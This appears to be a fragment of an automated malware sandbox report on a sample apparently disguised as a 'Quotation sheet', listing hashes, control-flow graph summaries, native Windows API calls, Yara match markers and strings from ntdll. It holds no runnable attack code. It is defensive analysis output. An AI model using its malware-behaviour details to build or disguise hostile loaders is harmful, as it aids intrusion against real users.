                                                                                                                        • Opcode ID: d29484e5eb7ae2639fbd5080f34328fb3e9cd63895686926c4071fb0e8dce555
                                                                                                                        • Instruction ID: f151b248fb7b0649e5ddaf43198875b9a9cf5474d4ad2352be8548eb90d2e258
                                                                                                                        • Opcode Fuzzy Hash: d29484e5eb7ae2639fbd5080f34328fb3e9cd63895686926c4071fb0e8dce555
                                                                                                                        • Instruction Fuzzy Hash: DA611B70A142499FD728DF6AE8416AEBFF2FBC8300F14D529D104AB258DF742C05CB90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d130ee4c54573bf4fe78d97d10c787029774a07b9125d4c8a3e6e1d7e029140e
                                                                                                                        • Instruction ID: 6b7ec7d38e7ea75dd025d73e5ad7d40781fc28362e27956016e84a744bc99cc8
                                                                                                                        • Opcode Fuzzy Hash: d130ee4c54573bf4fe78d97d10c787029774a07b9125d4c8a3e6e1d7e029140e
                                                                                                                        • Instruction Fuzzy Hash: 52610B70A182499FD728DF6AE8416AEBFF6FBC8300F14D529D104AB259DF786C05CB90

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:1.2%
                                                                                                                        Dynamic/Decrypted Code Coverage:5.1%
                                                                                                                        Signature Coverage:8.1%
                                                                                                                        Total number of Nodes:136
                                                                                                                        Total number of Limit Nodes:10

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 62 417983-4179ac call 42f553 65 4179b2-4179c0 call 42fb53 62->65 66 4179ae-4179b1 62->66 69 4179d0-4179e1 call 42e003 65->69 70 4179c2-4179cd call 42fdf3 65->70 75 4179e3-4179f7 LdrLoadDll 69->75 76 4179fa-4179fd 69->76 70->69 75->76
                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004179F5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440078070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 87 42c893-42c8cf call 404583 call 42daf3 NtClose
                                                                                                                        APIs
                                                                                                                        • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C8CA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440078070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Close
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3535843008-0

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 108 5372df0-5372dfc LdrInitializeThunk
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 107 5372c70-5372c7c LdrInitializeThunk
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: e51d236b05b0f719377291c1685fbd267f04bba3219bf1994fcf65462b28f5d5
                                                                                                                        • Instruction ID: 28a5d4865a2a197c8d0dabb675cee58a607a42c9e67f11166999f64a7bc50b70
                                                                                                                        • Opcode Fuzzy Hash: e51d236b05b0f719377291c1685fbd267f04bba3219bf1994fcf65462b28f5d5
                                                                                                                        • Instruction Fuzzy Hash: 0C90023620158802D114715C848475A401687D0301FD9C851A446465CD869989917121

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 106 5372b60-5372b6c LdrInitializeThunk
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 44d1666b6b9b251a433c4b58ae3ddb259d6462d71989e9aebabbf7d3e5b46ced
                                                                                                                        • Instruction ID: 4de08b8d6db3024b32d7c9f721f458df0d3f1f4603926b79210a2d2fd4469c3e
                                                                                                                        • Opcode Fuzzy Hash: 44d1666b6b9b251a433c4b58ae3ddb259d6462d71989e9aebabbf7d3e5b46ced
                                                                                                                        • Instruction Fuzzy Hash: 2A900266202500034109715C4494626801B87E0301BD5C461E1054594DC52989916125
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: fefb4bccd3fe4ad3f61545ade663b73cee65c080fe8f2db9eb2a2200b556fa7d
                                                                                                                        • Instruction ID: d1bb8f1cfd45e15d71e7fe1f663c8d5dfdfc43d56058d396376f5683ee9d2278
                                                                                                                        • Opcode Fuzzy Hash: fefb4bccd3fe4ad3f61545ade663b73cee65c080fe8f2db9eb2a2200b556fa7d
                                                                                                                        • Instruction Fuzzy Hash: 2090023660560402D104715C4594716501687D0301FE5C851A046456CD87998A5165A2

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(72Z53078,00000111,00000000,00000000), ref: 0041425A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440078070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID: 72Z53078$72Z53078
                                                                                                                        • API String ID: 1836367815-1643533592
                                                                                                                        • Opcode ID: 5c626eb4c4aa1a6981bfb54bef75fcda53ebc754134984ab69e00bc6286f52e7
                                                                                                                        • Instruction ID: d80221e1f92ecfeadebb637c57095649e674b75548d153b49727efd14be32985
                                                                                                                        • Opcode Fuzzy Hash: 5c626eb4c4aa1a6981bfb54bef75fcda53ebc754134984ab69e00bc6286f52e7
                                                                                                                        • Instruction Fuzzy Hash: 6E11E971D0025C7BEB11AAD59C81DEF7B7CEF81398F41806AF90067241D67C4E468BA5

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 15 4141b5-4141b6 16 414202-41424d call 42f423 call 417983 call 404533 call 424ff3 15->16 17 4141b8-4141d4 15->17 26 41426d-414273 16->26 27 41424f-41425e PostThreadMessageW 16->27 17->16 27->26 28 414260-41426a 27->28 28->26
                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(72Z53078,00000111,00000000,00000000), ref: 0041425A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440078070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID: 72Z53078$72Z53078
                                                                                                                        • API String ID: 1836367815-1643533592
                                                                                                                        • Opcode ID: 4e899c09560dd295b4eea09373e7647fd71c7e42d236753f5ecbf53d49dfd37f
                                                                                                                        • Instruction ID: d97c7e81621f105e2d626c040259cc675ae84d4bd95fa8f473abb00c886a2f57
                                                                                                                        • Opcode Fuzzy Hash: 4e899c09560dd295b4eea09373e7647fd71c7e42d236753f5ecbf53d49dfd37f
                                                                                                                        • Instruction Fuzzy Hash: 6701F972E0515C779B1056D5AC41CEFB77CDFC1398B4180ABFD08A7200D57D4E468BA5

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 29 4141e3-4141f5 30 4141fd-41424d call 42f423 call 417983 call 404533 call 424ff3 29->30 31 4141f8 call 42ea13 29->31 41 41426d-414273 30->41 42 41424f-41425e PostThreadMessageW 30->42 31->30 42->41 43 414260-41426a 42->43 43->41
                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(72Z53078,00000111,00000000,00000000), ref: 0041425A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440078070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID: 72Z53078$72Z53078
                                                                                                                        • API String ID: 1836367815-1643533592
                                                                                                                        • Opcode ID: c4552eebb31196f6cd9f473613f973db0c4a1c859779bfd7a2f9524f38007ed0
                                                                                                                        • Instruction ID: a90ec9ba706184b8e23d88f5e4a1604f18b8a3d9a5187ae4d770ddc4ed241e20
                                                                                                                        • Opcode Fuzzy Hash: c4552eebb31196f6cd9f473613f973db0c4a1c859779bfd7a2f9524f38007ed0
                                                                                                                        • Instruction Fuzzy Hash: 4001C4B2D0025C7ADB10AAE59C81DEF7B7CDF81798F41806AFA04B7241D67C5E468BA1

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 77 42cbd3-42cc17 call 404583 call 42daf3 RtlAllocateHeap
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(?,0041E72E,?,?,00000000,?,0041E72E,?,?,?), ref: 0042CC12
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440078070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: 15222f882391a6f1df90ded557e8b56f0e9c0d35b675ce76b94a4fce58941576
                                                                                                                        • Instruction ID: d487d3b03e5fd870cd6facd5e18d90f17e1e1b45fdd477a7ccf3870962209f68
                                                                                                                        • Opcode Fuzzy Hash: 15222f882391a6f1df90ded557e8b56f0e9c0d35b675ce76b94a4fce58941576
                                                                                                                        • Instruction Fuzzy Hash: 3CE06D71204214BBD714EF99EC41E9B77ACEFC9714F00441EFE08A7281D6B1BA1087B4

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 82 42cc23-42cc67 call 404583 call 42daf3 RtlFreeHeap
                                                                                                                        APIs
                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,74C08500,00000007,00000000,00000004,00000000,004171FB,000000F4), ref: 0042CC62
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440078070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3298025750-0
                                                                                                                        • Opcode ID: a497164907bf5a419709db9d104f4aa982b6752a18a8ef3b78ce65f3c83b4e63
                                                                                                                        • Instruction ID: 894252dbb0f647bccd5e653401c2ed1b3d00a7f31d77e8cb3dec32718668ce0a
                                                                                                                        • Opcode Fuzzy Hash: a497164907bf5a419709db9d104f4aa982b6752a18a8ef3b78ce65f3c83b4e63
                                                                                                                        • Instruction Fuzzy Hash: 44E06D71604204BBD614EE99DC41FDB73ACEFC9710F004419FE08A7241D675B91087B8

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 92 42cc73-42ccac call 404583 call 42daf3 ExitProcess
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(?,00000000,00000000,?,9F81E24E,?,?,9F81E24E), ref: 0042CCA7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440078070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 621844428-0
                                                                                                                        • Opcode ID: 6abe8fe8e270cf54b7c5ef24c89b3e40668488ce21fc277eab50321fbf2677f2
                                                                                                                        • Instruction ID: 67f0569bf662432a7029b5887b41a7f8390ff6dec00b4f54c651a328d785fc56
                                                                                                                        • Opcode Fuzzy Hash: 6abe8fe8e270cf54b7c5ef24c89b3e40668488ce21fc277eab50321fbf2677f2
                                                                                                                        • Instruction Fuzzy Hash: 0FE046362002147BD620AA5ADC41F9B776CEBC5724F00445AFA08A7281CAB5BA0487B4

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 97 417a50-417a51 98 417a53-417a56 97->98 99 4179d8-4179e1 97->99 100 4179e3-4179f7 LdrLoadDll 99->100 101 4179fa-4179fd 99->101 100->101
                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004179F5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440078070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0
                                                                                                                        • Opcode ID: dde08397e3d1080f24d77cc6b00d527da95b6d712252c6e7d203f8619dc81514
                                                                                                                        • Instruction ID: 3fde030f9168f7bec8c36b4ed3deb21c83c409ac85ce74226c2ab029a14b000e
                                                                                                                        • Opcode Fuzzy Hash: dde08397e3d1080f24d77cc6b00d527da95b6d712252c6e7d203f8619dc81514
                                                                                                                        • Instruction Fuzzy Hash: EFE0D875A5410AAFDB10CFC4CC81FDDB778EB04614F0083C7D5289B2C1E234AA4A8781

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 102 5372c0a-5372c0f 103 5372c11-5372c18 102->103 104 5372c1f-5372c26 LdrInitializeThunk 102->104
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Strings
                                                                                                                        • The instruction at %p tried to %s , xrefs: 053E8F66
                                                                                                                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 053E8DD3
                                                                                                                        • *** then kb to get the faulting stack, xrefs: 053E8FCC
                                                                                                                        • *** enter .cxr %p for the context, xrefs: 053E8FBD
                                                                                                                        • The critical section is owned by thread %p., xrefs: 053E8E69
                                                                                                                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 053E8DC4
                                                                                                                        • <unknown>, xrefs: 053E8D2E, 053E8D81, 053E8E00, 053E8E49, 053E8EC7, 053E8F3E
                                                                                                                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 053E8E86
                                                                                                                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 053E8E3F
                                                                                                                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 053E8F26
                                                                                                                        • The resource is owned shared by %d threads, xrefs: 053E8E2E
                                                                                                                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 053E8F2D
                                                                                                                        • write to, xrefs: 053E8F56
                                                                                                                        • *** Inpage error in %ws:%s, xrefs: 053E8EC8
                                                                                                                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 053E8E4B
                                                                                                                        • *** enter .exr %p for the exception record, xrefs: 053E8FA1
                                                                                                                        • The resource is owned exclusively by thread %p, xrefs: 053E8E24
                                                                                                                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 053E8FEF
                                                                                                                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 053E8F34
                                                                                                                        • The instruction at %p referenced memory at %p., xrefs: 053E8EE2
                                                                                                                        • a NULL pointer, xrefs: 053E8F90
                                                                                                                        • Go determine why that thread has not released the critical section., xrefs: 053E8E75
                                                                                                                        • an invalid address, %p, xrefs: 053E8F7F
                                                                                                                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 053E8DB5
                                                                                                                        • read from, xrefs: 053E8F5D, 053E8F62
                                                                                                                        • *** Resource timeout (%p) in %ws:%s, xrefs: 053E8E02
                                                                                                                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 053E8DA3
                                                                                                                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 053E8D8C
                                                                                                                        • *** An Access Violation occurred in %ws:%s, xrefs: 053E8F3F
                                                                                                                        • This failed because of error %Ix., xrefs: 053E8EF6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                                        • API String ID: 0-108210295
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                        • API String ID: 0-2160512332
                                                                                                                        Strings
                                                                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 053A54CE
                                                                                                                        • undeleted critical section in freed memory, xrefs: 053A542B
                                                                                                                        • 8, xrefs: 053A52E3
                                                                                                                        • double initialized or corrupted critical section, xrefs: 053A5508
                                                                                                                        • Critical section address., xrefs: 053A5502
                                                                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 053A540A, 053A5496, 053A5519
                                                                                                                        • Thread identifier, xrefs: 053A553A
                                                                                                                        • corrupted critical section, xrefs: 053A54C2
                                                                                                                        • Address of the debug info found in the active list., xrefs: 053A54AE, 053A54FA
                                                                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 053A5543
                                                                                                                        • Critical section address, xrefs: 053A5425, 053A54BC, 053A5534
                                                                                                                        • Critical section debug info address, xrefs: 053A541F, 053A552E
                                                                                                                        • Invalid debug info address of this critical section, xrefs: 053A54B6
                                                                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 053A54E2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                        • API String ID: 0-2368682639
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                                        • API String ID: 0-3197712848
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                                        • API String ID: 0-1357697941
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                        • API String ID: 0-1700792311
                                                                                                                        Strings
                                                                                                                        • SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING., xrefs: 053A2856
                                                                                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 053A28B2
                                                                                                                        • SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed., xrefs: 053A2881
                                                                                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 053A292E
                                                                                                                        • RtlpProbeAssemblyStorageRootForAssembly, xrefs: 053A29AC
                                                                                                                        • @, xrefs: 05363180
                                                                                                                        • SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p, xrefs: 053A29B1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @$RtlpProbeAssemblyStorageRootForAssembly$SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p$SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.$SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING.$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx
                                                                                                                        • API String ID: 0-541586583
                                                                                                                        Strings
                                                                                                                        • ***Exception thrown within loader***, xrefs: 053B4E27
                                                                                                                        • LdrpGenericExceptionFilter, xrefs: 053B4DFC
                                                                                                                        • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 053B4E38
                                                                                                                        • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 053B4DF5
                                                                                                                        • LdrpProtectedCopyMemory, xrefs: 053B4DF4
                                                                                                                        • Execute '.cxr %p' to dump context, xrefs: 053B4EB1
                                                                                                                        • minkernel\ntdll\ldrutil.c, xrefs: 053B4E06
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                                                                        • API String ID: 0-2973941816
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                                                        • API String ID: 0-4098886588
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
